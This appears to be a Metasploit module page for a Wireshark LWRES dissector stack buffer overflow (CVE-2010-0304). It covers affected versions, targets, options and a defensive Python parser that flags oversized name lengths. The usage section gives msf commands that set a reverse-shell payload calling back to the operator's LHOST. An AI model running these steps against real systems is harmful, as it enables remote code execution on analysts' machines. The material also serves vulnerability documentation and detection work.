Wireshark LWRES Dissector getaddrsbyname_request Buffer Overflow (loop)
The LWRES dissector in Wireshark versions 0.9.15 through 1.0.10 and 1.2.0 through 1.2.5 allows remote attackers to execute arbitrary code due to a stack-based buffer overflow. This bug was found and reported by babi. This particular exploit targets the dissect_getaddrsbyname_request function. Several other functions also contain potentially exploitable stack-based buffer overflows. The Windows version (of 1.2.5 at least) is compiled with /GS, which prevents exploitation via the return address on the stack. Sending a larger string allows exploitation using the SEH bypass method. However, this packet will usually get fragmented, which may cause additional complications. NOTE: The vulnerable code is reached only when the packet dissection is rendered. If the packet is fragmented, all fragments must be captured and reassembled to exploit this issue. This version loops, sending the packet every X seconds until the job is killed.
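As an added defensive example (not code from this module or from Wireshark), the parser below walks the LWRES header and the getaddrsbyname request body and flags the two things worth triaging in a capture: a declared name length that exceeds the 255-octet DNS name limit, and a name length that exceeds the bytes actually present (a fragment or a forged length). The header and body layout follow BIND's lwres packet format (lwres_lwpacket_t and lwres_gabnrequest_render); the sample packets, the build_request() fixture and the 255-octet threshold are assumptions of this example, not values from the page.

```python
import struct

LWRES_HEADER_LEN = 28               # sizeof(lwres_lwpacket_t) in BIND's lwres
OPCODE_GETADDRSBYNAME = 0x00010001  # LWRES_OPCODE_GETADDRSBYNAME
MAX_DNS_NAME = 255                  # longest legal DNS name in octets (RFC 1035); assumed threshold
HDR_FMT = "!IHHIIIIHH"              # length, version, pktflags, serial, opcode,
                                    # result, recvlength, authtype, authlength


def parse_getaddrsbyname_request(pkt: bytes) -> dict:
    """Parse one LWRES packet; return its fields plus a list of length anomalies."""
    findings = []
    info = {"opcode": None, "findings": findings}
    if len(pkt) < LWRES_HEADER_LEN:
        findings.append("truncated before end of 28-byte header")
        return info
    length, _ver, _flg, _serial, opcode, *_rest = struct.unpack(HDR_FMT, pkt[:LWRES_HEADER_LEN])
    info["opcode"] = opcode
    if opcode != OPCODE_GETADDRSBYNAME:
        return info                  # other opcodes are out of scope here
    if length != len(pkt):
        findings.append(f"declared length {length} != captured {len(pkt)} (fragmented or forged)")
    body = pkt[LWRES_HEADER_LEN:]    # flags(4) addrtypes(4) namelen(2) name[namelen] NUL
    if len(body) < 10:
        findings.append("request body truncated before namelen")
        return info
    flags, addrtypes, namelen = struct.unpack("!IIH", body[:10])
    name = body[10:10 + namelen]
    info.update({"flags": flags, "addrtypes": addrtypes, "namelen": namelen, "name": name})
    if len(name) < namelen:
        findings.append(f"namelen {namelen} exceeds remaining payload {len(name)}")
    if namelen > MAX_DNS_NAME:
        findings.append(f"namelen {namelen} exceeds max DNS name length {MAX_DNS_NAME}")
    return info


def build_request(name: bytes) -> bytes:
    """Constructed test fixture laid out like lwres_gabnrequest_render (assumption)."""
    body = struct.pack("!IIH", 0, 1, len(name)) + name + b"\x00"
    hdr = struct.pack(HDR_FMT, LWRES_HEADER_LEN + len(body), 0, 0, 1,
                      OPCODE_GETADDRSBYNAME, 0, 0, 0, 0)
    return hdr + body


if __name__ == "__main__":
    for label, pkt in [("normal", build_request(b"www.example.com")),
                       ("oversized", build_request(b"A" * 300))]:
        print(label, parse_getaddrsbyname_request(pkt)["findings"])
```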
Exploit Rank
- Great
Exploit Authors
- babi
- jduck < jduck [at] metasploit.com >
- redsand
Vulnerability References
- CVE-2010-0304
- OSVDB-61987
- BID-37985
- http://www.wireshark.org/security/wnpa-sec-2010-02.html
- http://anonsvn.wireshark.org/viewvc/trunk-1.2/epan/dissectors/packet-lwres.c?...
Exploit Targets
- 0 - tshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
- 1 - wireshark 1.0.2-3+lenny7 on Debian 5.0.3 (x86)
- 2 - wireshark 1.2.5 on RHEL 5.4 (x64)
- 3 - wireshark 1.2.5 on Mac OS X 10.5 (x86)
- 4 - wireshark/tshark 1.2.1 and 1.2.5 on Windows (x86) (default)
Exploit Development
Similar Exploit Modules
- exploit/multi/misc/batik_svg_java
- exploit/multi/misc/hp_vsa_exec
- exploit/multi/misc/java_rmi_server
- exploit/multi/misc/openview_omniback_exec
- exploit/multi/misc/veritas_netbackup_cmdexec
- exploit/multi/misc/wireshark_lwres_getaddrbyname
- exploit/multi/misc/zend_java_bridge
Exploit Usage Information
msf > use exploit/multi/misc/wireshark_lwres_getaddrbyname_loop
msf exploit(wireshark_lwres_getaddrbyname_loop) > show payloads
msf exploit(wireshark_lwres_getaddrbyname_loop) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(wireshark_lwres_getaddrbyname_loop) > set LHOST [MY IP ADDRESS]
msf exploit(wireshark_lwres_getaddrbyname_loop) > exploit
Exploit Module Options
| Option | Description |
|---|---|
| DELAY | This option sets the delay between sent packets (default: 5) |
| INTERFACE | The name of the interface |
| RHOST | The target address (default: 239.255.255.250) |
| RPORT | The target port (default: 921) |
| SHOST | This option can be used to specify a spoofed source address |
| SNAPLEN | The number of bytes to capture (default: 65535) |
| TIMEOUT | The number of seconds to wait for new data (default: 500) |
| CHOST | The local client address |
| CPORT | The local client port |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| DynamicSehRecord | Generate a dynamic SEH record (more stealthy) |
| EnableContextEncoding | Use transient context when encoding payloads |
| ExitOnSession | Return from the exploit after a session has been created |
| GATEWAY | The gateway IP address. This will be used rather than a random remote address for the UDP probe, if set. |
| NETMASK | The local network mask. This is used to decide if an address is in the local network. |
| UDP_SECRET | The 32-bit cookie for UDP probe requests. |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
